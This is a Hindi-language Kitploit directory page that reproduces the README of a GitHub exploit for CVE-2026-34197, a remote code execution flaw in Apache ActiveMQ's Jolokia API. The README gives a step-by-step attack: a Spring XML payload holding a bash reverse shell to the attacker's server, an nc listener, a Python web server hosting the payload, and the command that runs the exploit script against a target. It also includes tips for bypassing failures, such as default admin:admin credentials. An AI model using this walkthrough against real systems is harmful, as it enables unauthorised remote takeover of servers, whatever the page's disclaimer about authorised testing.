Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-34197-payload-Apache-ActiveMQ- — CVE-2026-34197 के लिए एक्सप्लॉइट स्क्रिप्ट, जो Apache ActiveMQ के Jolokia API को लक्षित करके दुर्भावनापूर्ण Spring XML कॉन्फ़िगरेशन के माध्यम से रिमोट कोड एक्ज़ीक्यूशन प्राप्त करती है, जिसमें रिवर्स शेल क्षमता शामिल है। | Kitploit
उपकरण/GitHubGitHub/xshysjhq/cve-2026-34197-payload-apache-activemq-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubxshysjhq/cve-2026-34197-payload-apache-activemq-

CVE-2026-34197-payload-Apache-ActiveMQ-

CVE-2026-34197 के लिए एक्सप्लॉइट स्क्रिप्ट, जो Apache ActiveMQ के Jolokia API को लक्षित करके दुर्भावनापूर्ण Spring XML कॉन्फ़िगरेशन के माध्यम से रिमोट कोड एक्ज़ीक्यूशन प्राप्त करती है, जिसमें रिवर्स शेल क्षमता शामिल है।

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ActiveMQ Jolokia RCE भेद्यता पुनरुत्पादन मार्गदर्शिका

यह रिपॉजिटरी Apache ActiveMQ द्वारा उजागर किए गए Jolokia API इंटरफ़ेस (/api/jolokia/) पर आधारित रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता के पुनरुत्पादन के लिए एक वातावरण और शोषण स्क्रिप्ट प्रदान करता है। addNetworkConnector ऑपरेशन को कॉल करके, ActiveMQ को दुर्भावनापूर्ण रूप से निर्मित रिमोट Spring XML कॉन्फ़िगरेशन फ़ाइल को पार्स करने के लिए मजबूर किया जाता है, जिससे MethodInvokingFactoryBean के माध्यम से सिस्टम कमांड निष्पादित किए जाते हैं।

📁 शामिल फ़ाइलें

  • payload.py: मुख्य शोषण स्क्रिप्ट, जो गतिशील Broker नाम के साथ HTTP POST अनुरोध भेजती है।
  • payload.xml: दुर्भावनापूर्ण Spring Bean कॉन्फ़िगरेशन फ़ाइल, जिसमें रिवर्स शेल का कमांड पेलोड शामिल है।

🛠️ पर्यावरण तैयारी

  1. Python 3 वातावरण
  • निर्भरताएँ स्थापित करें:
    root@kitploit:~
    pip install requests
    
  • आक्रमण मशीन (जैसे क्लाउड सर्वर): इसमें सार्वजनिक IP होना चाहिए, और HTTP सेवा पोर्ट तथा रिवर्स शेल सुनने के लिए पोर्ट खोलने में सक्षम होना चाहिए।
  • लक्ष्य मशीन: भेद्यता वाली ActiveMQ सेवा (जैसे apache/activemq-classic:6.1.0 Docker इमेज)।
  • 🚀 पुनरुत्पादन चरण

    1. आक्रमण पेलोड कॉन्फ़िगर करें (payload.xml)

    आक्रमण मशीन पर payload.xml खोलें और निम्नलिखित भाग ढूंढें:

    root@kitploit:~
    <value>bash -c 'bash -i >& /dev/tcp/आपका-क्लाउड-सर्वर-IP/15000 0>&1'</value>
    

    इसमें IP को अपने क्लाउड सर्वर के सार्वजनिक IP से बदलें। यदि लक्ष्य वातावरण में bash उपलब्ध नहीं है, तो लक्ष्य वातावरण के अनुसार इसे sh या अन्य निष्पादन विधि में बदलें।

    2. रिवर्स शेल सुनना शुरू करें

    आक्रमण मशीन (क्लाउड सर्वर) पर एक टर्मिनल खोलें और निर्दिष्ट पोर्ट (जैसे 15000) पर सुनें:

    root@kitploit:~
    nc -lvvp 15000
    

    ध्यान दें: सुनिश्चित करें कि क्लाउड सर्वर के सुरक्षा समूह/फ़ायरवॉल ने इनबाउंड TCP 15000 पोर्ट को अनुमति दी है।

    3. पेलोड होस्ट करने के लिए HTTP सेवा शुरू करें

    आक्रमण मशीन पर (payload.xml के समान निर्देशिका में), लक्ष्य को XML फ़ाइल डाउनलोड करने के लिए एक HTTP सर्वर शुरू करें:

    root@kitploit:~
    python3 -m http.server 9000
    

    ध्यान दें: यह भी सुनिश्चित करें कि क्लाउड सर्वर के सुरक्षा समूह/फ़ायरवॉल ने इनबाउंड TCP 9000 पोर्ट को अनुमति दी है।

    4. भेद्यता शोषण स्क्रिप्ट निष्पादित करें

    स्थानीय मशीन (या आक्रमण मशीन) पर payload.py चलाएँ। स्क्रिप्ट कमांड-लाइन तर्कों के माध्यम से लक्ष्य ActiveMQ का IP:पोर्ट (-t) और आक्रमण मशीन द्वारा होस्ट किए गए XML का IP:पोर्ट (-a) स्वीकार करती है।

    root@kitploit:~
    python payload.py -t 192.168.0.1:8161 -a 8.8.8.8:9000
    

    चलाने के बाद, स्क्रिप्ट स्वचालित रूप से एक यादृच्छिक brokerName (जैसे rce_a1b2c3) उत्पन्न करेगी, ताकि java.io.IOException : Network Connector could not be registered in JMX नाम संघर्ष त्रुटि को पूरी तरह से हल किया जा सके।

    5. शेल प्राप्त करें

    यदि शोषण सफल होता है:

    1. आपका HTTP सर्वर (python3 -m http.server 9000) /payload.xml के लिए एक GET 200 अनुरोध रिकॉर्ड दिखाएगा।
    2. आपका nc सुनने वाला टर्मिनल लक्ष्य मशीन से रिवर्स शेल कनेक्शन प्राप्त करेगा।

    ⚠️ सामान्य समस्या समाधान

    1. XML सफलतापूर्वक प्राप्त हुआ (HTTP 200), लेकिन शेल नहीं मिला:
      • कारण A: क्लाउड सर्वर के सुरक्षा समूह ने रिवर्स शेल को रोक दिया (इनबाउंड ट्रैफ़िक के लिए 15000 पोर्ट अनुमत नहीं है)।
      • कारण B: लक्ष्य कंटेनर में /bin/bash कमांड उपलब्ध नहीं है (जैसे Alpine जैसी हल्की बेस इमेज में सामान्य)। कृपया payload.xml में निष्पादन कमांड को /bin/sh में बदलें, या wget/curl के माध्यम से स्क्रिप्ट डाउनलोड करके निष्पादित करें।
    2. लक्ष्य 401 Unauthorized त्रुटि देता है:
    • कारण: उच्च संस्करण वाले ActiveMQ / Jolokia इंटरफ़ेस को उपयोगकर्ता नाम और पासवर्ड प्रमाणीकरण की आवश्यकता होती है।
    • समाधान: यदि डिफ़ॉल्ट क्रेडेंशियल हैं, तो अनुरोध में Basic Auth जोड़ें (जैसे admin:admin)।

    🛡️ अस्वीकरण

    यह स्क्रिप्ट और निर्देश केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक अध्ययन के लिए हैं। किसी भी अनधिकृत अवैध परीक्षण के लिए इसका उपयोग सख्त वर्जित है। उपयोगकर्ता अपने स्वयं के कार्यों के लिए जिम्मेदार है।

    टूल डाउनलोड करें